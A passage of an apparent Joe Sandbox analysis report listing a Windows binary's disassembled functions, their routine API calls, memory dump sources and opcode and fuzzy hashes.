                                                                                                                                                      • Instruction Fuzzy Hash: 61E048742C0305BFDF206BE0ED06B593A95FB60B62F100030F90EB44E0D77198129695
                                                                                                                                                      Function 00A507EA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                      • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                                                                                      • Instruction ID: fe8f8cc175ee5c1384718a0242722480302fdaca5a71414d09aa474986fa04f2
                                                                                                                                                      • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                                                                                      • Instruction Fuzzy Hash: E5A13872A04786DFEB12CF28C891FAEBBE4FF51351F184169ED959B282C6348D49C750
                                                                                                                                                      Function 00A53638 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A50481,?,00000000,?,00000001,?,?,00000001,00A50481,?), ref: 00A53685
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5370E
                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A4DBD1,?), ref: 00A53720
                                                                                                                                                      • __freea.LIBCMT ref: 00A53729
                                                                                                                                                        • Part of subcall function 00A5040E: RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                      • Opcode ID: 16fbe324d651b5029c9cf6a3ba19958b9cb6563a7cd5b700cbe777037e7ce2e5
                                                                                                                                                      • Instruction ID: a4aed89a3a6b63e1972ad38419fedfbad1a6aa2ef49aaece2fbb0d0ec664ba80
                                                                                                                                                      • Opcode Fuzzy Hash: 16fbe324d651b5029c9cf6a3ba19958b9cb6563a7cd5b700cbe777037e7ce2e5
                                                                                                                                                      • Instruction Fuzzy Hash: AF319FB2A0020AABDF25DF65DC45DAF7BA5FB84791F144128FC04D6250E735CE55CBA0
                                                                                                                                                      Function 00A362CD Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A362D4
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00A362EB
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00A36328
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A36338
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3741103063-0
                                                                                                                                                      • Opcode ID: ff0f61575a9a32eef9dbc4ba4554e14840c376bd12c88a860f4b583d73d8e9c2
                                                                                                                                                      • Instruction ID: 1bedbd223bc7fedb206481c8abd99b9a61e342f3bb4a7aa2bab98ecfcbd2b381
                                                                                                                                                      • Opcode Fuzzy Hash: ff0f61575a9a32eef9dbc4ba4554e14840c376bd12c88a860f4b583d73d8e9c2
                                                                                                                                                      • Instruction Fuzzy Hash: A8119A70A0121AAF9B049FA99E859BFBB79BF45310B04412DB411AB280DB34AE01CBA4
                                                                                                                                                      Function 00A3126C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A31273
                                                                                                                                                        • Part of subcall function 00A3067E: GetVersionExW.KERNEL32(?), ref: 00A306AF
                                                                                                                                                      • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00A2350C,5C02E13E,00000000,?,?,00A243F5,?,?,?,00000000), ref: 00A3129A
                                                                                                                                                      • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00A312D4
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A312DF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FoldString$H_prolog3Version_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 535866816-0
                                                                                                                                                      • Opcode ID: c847ff049ed6cb367d425921aa98b04410053cc0f429b99888320754d11bf79f
                                                                                                                                                      • Instruction ID: 000bde355a7b1bf8604bb698dcf02a322a9cba0af0c20f5feffba43ebd9cf7fc
                                                                                                                                                      • Opcode Fuzzy Hash: c847ff049ed6cb367d425921aa98b04410053cc0f429b99888320754d11bf79f
                                                                                                                                                      • Instruction Fuzzy Hash: F6117371A01625ABDB009BA98E499BFBB79BF45721F100319B910E72C1CB70A950C7F1
                                                                                                                                                      Function 00A519E4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00A5198B,00000000,00000000,00000000,00000000,?,00A51B88,00000006,FlsSetValue), ref: 00A51A16
                                                                                                                                                      • GetLastError.KERNEL32(?,00A5198B,00000000,00000000,00000000,00000000,?,00A51B88,00000006,FlsSetValue,00A60DD0,FlsSetValue,00000000,00000364,?,00A500D7), ref: 00A51A22
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5198B,00000000,00000000,00000000,00000000,?,00A51B88,00000006,FlsSetValue,00A60DD0,FlsSetValue,00000000), ref: 00A51A30
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                      • Opcode ID: b51269b5d59d369c3f793bc76a5432dff1f54ac0dd44f62b47ca67f2220999b5
                                                                                                                                                      • Instruction ID: a894459be1db05922a86578c09386788b0071907106638e08665d77b06db7270
                                                                                                                                                      • Opcode Fuzzy Hash: b51269b5d59d369c3f793bc76a5432dff1f54ac0dd44f62b47ca67f2220999b5
                                                                                                                                                      • Instruction Fuzzy Hash: D101D8727463229FC722CBA89C44B667798FB147F7B110524EF0AD3144C730D80586E0
                                                                                                                                                      Function 00A31309 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A31310
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00A317FB,?,?,\\?\,5C02E116,?,?,?,00000000,00A5A279,000000FF), ref: 00A31319
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00A5A279,000000FF), ref: 00A31348
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A31351
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectory$H_prolog3_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 19219720-0
                                                                                                                                                      • Opcode ID: aa6d41c0a26b04d67aeaa4800ae00e131e1843cae527a0d95e72ad44b4da1d8a
                                                                                                                                                      • Instruction ID: 716fca243e1436328b5e79dac29000bf7b492d099a292a54ec9528dd9a6f435d
                                                                                                                                                      • Opcode Fuzzy Hash: aa6d41c0a26b04d67aeaa4800ae00e131e1843cae527a0d95e72ad44b4da1d8a
                                                                                                                                                      • Instruction Fuzzy Hash: 7701A275D0062AFB8B40AFF89A558BFBB79BF91720F100219B511EB281CF34990186E0
                                                                                                                                                      Function 00A4631E Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SleepConditionVariableCS.KERNELBASE(?,00A462BB,00000064), ref: 00A46341
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00A760E0,?,?,00A462BB,00000064,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A4634B
                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00A462BB,00000064,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A4635C
                                                                                                                                                      • EnterCriticalSection.KERNEL32(00A760E0,?,00A462BB,00000064,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A46363
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3269011525-0
                                                                                                                                                      • Opcode ID: 46956f53ba106c969f54642ce5f6f4e0cdbd98d3d1ce6254ed1857699e7a4ad8
                                                                                                                                                      • Instruction ID: 2c359402e89c6796fe6b626e4e7b4b4ee2396c1f1fbc358571a375c7c601c2b4
                                                                                                                                                      • Opcode Fuzzy Hash: 46956f53ba106c969f54642ce5f6f4e0cdbd98d3d1ce6254ed1857699e7a4ad8
                                                                                                                                                      • Instruction Fuzzy Hash: 8DE06D31540B34FFC7116BD0BC09B9D7F28BB05BA2B04C010F50AA61A0C76169129BD5
                                                                                                                                                      Function 00A3EB74 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00A3EB77
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A3EB86
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A3EB94
                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A3EBA2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                      • Opcode ID: 2d2d56eb7a6bdfd305fb44abb55d0e976733d7285d66f9d16377c619f95f91fa
                                                                                                                                                      • Instruction ID: 2d49f3372408b170fed2180b33633884f262c45e86bea17e81cea8b5ee2a868f
                                                                                                                                                      • Opcode Fuzzy Hash: 2d2d56eb7a6bdfd305fb44abb55d0e976733d7285d66f9d16377c619f95f91fa
                                                                                                                                                      • Instruction Fuzzy Hash: 35E0E631985F2057D6119BF07D1DB8A3B549B15753F408151F609991E0C6A044828BD4
                                                                                                                                                      Function 00A37C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00A38294
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                        • Part of subcall function 00A4087E: __EH_prolog3_GS.LIBCMT ref: 00A40885
                                                                                                                                                        • Part of subcall function 00A4087E: GetLastError.KERNEL32(0000001C,00A38244,?,00000000,00000086,?,5C02E116,?,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A4089D
                                                                                                                                                        • Part of subcall function 00A4087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A408D6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                                                                                                                      • String ID: %ls
                                                                                                                                                      • API String ID: 1279724102-3246610740
                                                                                                                                                      • Opcode ID: efbfddae33be045df1128f018ccdc3ad17fe9868b8aaaa0ff9b0895f32e9b0ba
                                                                                                                                                      • Instruction ID: afe31efff060b3231e35aa4924ee0053ade59d1deae873b86de5472f36278d85
                                                                                                                                                      • Opcode Fuzzy Hash: efbfddae33be045df1128f018ccdc3ad17fe9868b8aaaa0ff9b0895f32e9b0ba
                                                                                                                                                      • Instruction Fuzzy Hash: 23B1BEB0800209EEDB34EF94CE56FEE7BB1BF25340F204919F456271D1DBB96A54DA80
                                                                                                                                                      Function 00A3EF21 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A3EBAA: GetDC.USER32(00000000), ref: 00A3EBAE
                                                                                                                                                        • Part of subcall function 00A3EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A3EBB9
                                                                                                                                                        • Part of subcall function 00A3EBAA: ReleaseDC.USER32(00000000,00000000), ref: 00A3EBC4
                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00A3EF65
                                                                                                                                                        • Part of subcall function 00A3F1EC: GetDC.USER32(00000000), ref: 00A3F1F5
                                                                                                                                                        • Part of subcall function 00A3F1EC: GetObjectW.GDI32(?,00000018,?), ref: 00A3F224
                                                                                                                                                        • Part of subcall function 00A3F1EC: ReleaseDC.USER32(00000000,?), ref: 00A3F2BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                                                                                      • String ID: (
                                                                                                                                                      • API String ID: 1061551593-3887548279
                                                                                                                                                      • Opcode ID: 04d67bf5b729b3ed26e4137a9da3395ee2bf0ccc0c3853c07e50cac1c674683c
                                                                                                                                                      • Instruction ID: 11f64d7c4dd20cbb077d32e878e5c1e7bcaa81f0296ad7519e3dbfab58a615e9
                                                                                                                                                      • Opcode Fuzzy Hash: 04d67bf5b729b3ed26e4137a9da3395ee2bf0ccc0c3853c07e50cac1c674683c
                                                                                                                                                      • Instruction Fuzzy Hash: 12910471618314AFC650DF69DC44A6FBBE9FF89710F00491EF98AD7260CB70A905CB62
                                                                                                                                                      Function 00A51E68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00A51FD4
                                                                                                                                                        • Part of subcall function 00A4ACBB: IsProcessorFeaturePresent.KERNEL32(00000017,00A4AC8D,00A4535E,?,?,00000000,00A4535E,00000016,?,?,00A4AC9A,00000000,00000000,00000000,00000000,00000000), ref: 00A4ACBD
                                                                                                                                                        • Part of subcall function 00A4ACBB: GetCurrentProcess.KERNEL32(C0000417,?,00A4535E), ref: 00A4ACDF
                                                                                                                                                        • Part of subcall function 00A4ACBB: TerminateProcess.KERNEL32(00000000,?,00A4535E), ref: 00A4ACE6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                      • String ID: *?$.
                                                                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                                                                      • Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                                                                                                                      • Instruction ID: 07662469301213ae37ba5ed50faab163fdfef43d071505e132de36bb22213df5
                                                                                                                                                      • Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                                                                                                                      • Instruction Fuzzy Hash: 33518C76E0020AAFDB14CFA8C881ABDB7B5FF98315F24416AEC54A7341E7359A09CB50
                                                                                                                                                      Function 00A2F103 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A379F7: GetSystemTime.KERNEL32(?,00000000), ref: 00A37A0F
                                                                                                                                                        • Part of subcall function 00A379F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A37A1D
                                                                                                                                                        • Part of subcall function 00A379A0: __aulldiv.LIBCMT ref: 00A379A9
                                                                                                                                                      • __aulldiv.LIBCMT ref: 00A2F162
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,5C02E116,?,?,00000000,?,00000000,00A59F3D,000000FF), ref: 00A2F169
                                                                                                                                                        • Part of subcall function 00A21150: _wcslen.LIBCMT ref: 00A2115B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                                                                                                                      • String ID: .rartemp
                                                                                                                                                      • API String ID: 3789791499-2558811017
                                                                                                                                                      • Opcode ID: 2acd86d5375999bd7ac621e81009fad12e820a1082500e1510013ef0d34e32f8
                                                                                                                                                      • Instruction ID: dafc3cd5638f3e6f1719d4d94c72035b49010d9a043c2b609d371a7978d9184f
                                                                                                                                                      • Opcode Fuzzy Hash: 2acd86d5375999bd7ac621e81009fad12e820a1082500e1510013ef0d34e32f8
                                                                                                                                                      • Instruction Fuzzy Hash: 62416E71900258AFDF14EFA8DD45EEE77B9FF54350F404129B915A3282EB349B49CBA0
                                                                                                                                                      Function 00A3DACE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A3DAD5
                                                                                                                                                        • Part of subcall function 00A30360: __EH_prolog3.LIBCMT ref: 00A30367
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
